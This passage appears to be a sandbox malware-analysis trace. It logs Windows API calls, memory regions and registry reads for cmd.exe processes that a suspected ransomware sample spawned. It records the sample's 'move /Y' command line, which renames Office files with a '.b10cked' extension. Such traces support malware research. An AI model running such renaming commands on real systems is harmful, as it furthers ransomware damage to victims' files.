(_String1="move", _String2="ECHO") returned 8 [0197.457] _wcsicmp (_String1="move", _String2="SET") returned -6 [0197.457] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0197.457] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0197.457] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0197.457] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0197.457] _wcsicmp (_String1="move", _String2="MD") returned 11 [0197.457] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0197.457] _wcsicmp (_String1="move", _String2="RD") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0197.457] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0197.457] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0197.457] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0197.457] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0197.457] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0197.457] _wcsicmp (_String1="move", _String2="VER") returned -9 [0197.457] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0197.457] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0197.457] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0197.457] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0197.458] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0197.458] _wcsicmp (_String1="move", _String2="START") returned -6 [0197.458] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0197.458] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0197.458] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0197.460] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.460] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0197.460] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f44c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f444, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f444*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0197.460] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0197.461] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0197.462] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0197.462] _wcsicmp (_String1="MSEXCE~2.HXN", _String2=".") returned 63 [0197.462] _wcsicmp (_String1="MSEXCE~2.HXN", _String2="..") returned 63 [0197.462] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~2.hxn")) returned 0x2022 [0197.505] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2a1e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0197.505] SetErrorMode (uMode=0x0) returned 0x0 [0197.505] SetErrorMode (uMode=0x1) returned 0x0 [0197.505] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", nBufferLength=0x104, lpBuffer=0x18edd4, lpFilePart=0x18edbc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", lpFilePart=0x18edbc*="MSEXCE~2.HXN") returned 0x27 [0197.505] SetErrorMode (uMode=0x0) returned 0x1 [0197.505] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0197.506] _wcsicmp (_String1="MSEXCE~2.HXN", _String2=".") returned 63 [0197.506] _wcsicmp (_String1="MSEXCE~2.HXN", _String2="..") returned 63 [0197.506] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msexce~2.hxn")) returned 0x2022 [0197.506] SetErrorMode (uMode=0x0) returned 0x0 [0197.506] SetErrorMode (uMode=0x1) returned 0x0 [0197.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", nBufferLength=0x104, lpBuffer=0x18f250, lpFilePart=0x18efe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", lpFilePart=0x18efe8*="MSEXCE~2.HXN") returned 0x27 [0197.506] SetErrorMode (uMode=0x0) returned 0x1 [0197.506] SetErrorMode (uMode=0x0) returned 0x0 [0197.506] SetErrorMode (uMode=0x1) returned 0x0 [0197.506] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x18f458, lpFilePart=0x18efe8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked", lpFilePart=0x18efe8*="MS.EXCEL.DEV.14.1033.hxn.b10cked") returned 0x3b [0197.506] SetErrorMode (uMode=0x0) returned 0x1 [0197.506] SetLastError (dwErrCode=0x0) [0197.506] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.excel.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0197.507] GetLastError () returned 0x2 [0197.507] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e964, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e964) returned 0x290e88 [0197.507] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x18e964 | out: lpFindFileData=0x18e964) returned 0 [0197.508] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.508] GetLastError () returned 0x12 [0197.508] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x18e964, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e964) returned 0x290e88 [0197.508] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x18e964 | out: lpFindFileData=0x18e964) returned 0 [0197.508] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.508] GetLastError () returned 0x12 [0197.509] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2a1bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a1bf0) returned 0x290e88 [0197.509] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x2a1bf0 | out: lpFindFileData=0x2a1bf0) returned 0 [0197.509] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.510] GetLastError () returned 0x12 [0197.510] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x2a1bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a1bf0) returned 0x290e88 [0197.510] FindNextFileW (in: hFindFile=0x290e88, lpFindFileData=0x2a1bf0 | out: lpFindFileData=0x2a1bf0) returned 0 [0197.510] FindClose (in: hFindFile=0x290e88 | out: hFindFile=0x290e88) returned 1 [0197.510] GetLastError () returned 0x12 [0197.510] _get_osfhandle (_FileHandle=2) returned 0xb [0197.510] GetFileType (hFile=0xb) returned 0x2 [0197.510] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0197.510] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x18eb34 | out: lpMode=0x18eb34) returned 1 [0197.510] _get_osfhandle (_FileHandle=2) returned 0xb [0197.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x18eb68 | out: lpConsoleScreenBufferInfo=0x18eb68) returned 1 [0197.511] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.512] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18eba8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0197.512] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x18eb8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18eb8c*=0x2c) returned 1 [0197.512] longjmp () [0197.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.513] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.513] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.513] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.513] SetConsoleInputExeNameW () returned 0x1 [0197.513] GetConsoleOutputCP () returned 0x1b5 [0197.513] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0197.513] SetThreadUILanguage (LangId=0x0) returned 0x409 [0197.514] exit (_Code=1) Process: id = "461" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGROO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GROOVE.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29196 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29197 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29198 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29199 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 29200 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29201 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29202 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29203 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29204 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 29205 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29396 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29397 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29398 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29399 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 29400 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 29401 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29402 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29403 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29404 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29405 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29406 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29407 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29408 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29409 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29410 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 29411 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29412 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29413 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29414 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29415 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29416 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 29417 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 29418 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 29419 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 29440 start_va = 0x2f0000 end_va = 0x3affff entry_point = 0x2f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 657 os_tid = 0x62c [0199.708] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff34 | out: lpSystemTimeAsFileTime=0x20ff34*(dwLowDateTime=0xabd92360, dwHighDateTime=0x1d440a9)) [0199.708] GetCurrentProcessId () returned 0x698 [0199.708] GetCurrentThreadId () returned 0x62c [0199.708] GetTickCount () returned 0x38777 [0199.708] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff2c | out: lpPerformanceCount=0x20ff2c*=25649768744) returned 1 [0199.709] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0199.709] __set_app_type (_Type=0x1) [0199.709] __p__fmode () returned 0x76b331f4 [0199.709] __p__commode () returned 0x76b331fc [0199.709] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0199.709] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0199.709] GetCurrentThreadId () returned 0x62c [0199.710] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x62c) returned 0x38 [0199.710] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0199.710] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0199.710] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.710] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.710] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fec4 | out: phkResult=0x20fec4*=0x0) returned 0x2 [0199.710] VirtualQuery (in: lpAddress=0x20fefb, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0199.710] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe94, dwLength=0x1c | out: lpBuffer=0x20fe94*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0199.710] GetConsoleOutputCP () returned 0x1b5 [0199.710] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0199.710] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0199.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0199.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.711] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0199.711] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.711] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.711] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0199.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.711] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0199.711] GetEnvironmentStringsW () returned 0x3d0180* [0199.711] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0199.712] GetEnvironmentStringsW () returned 0x3d0180* [0199.712] FreeEnvironmentStringsW (penv=0x3d0180) returned 1 [0199.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee34 | out: phkResult=0x20ee34*=0x40) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0xa8, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x0, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegCloseKey (hKey=0x40) returned 0x0 [0199.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee34 | out: phkResult=0x20ee34*=0x40) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x40, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x0, lpData=0x20ee40*=0x1, lpcbData=0x20ee38*=0x1000) returned 0x2 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x0, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee3c, lpData=0x20ee40, lpcbData=0x20ee38*=0x1000 | out: lpType=0x20ee3c*=0x4, lpData=0x20ee40*=0x9, lpcbData=0x20ee38*=0x4) returned 0x0 [0199.712] RegQueryValueExW (in: hKey=0x40, 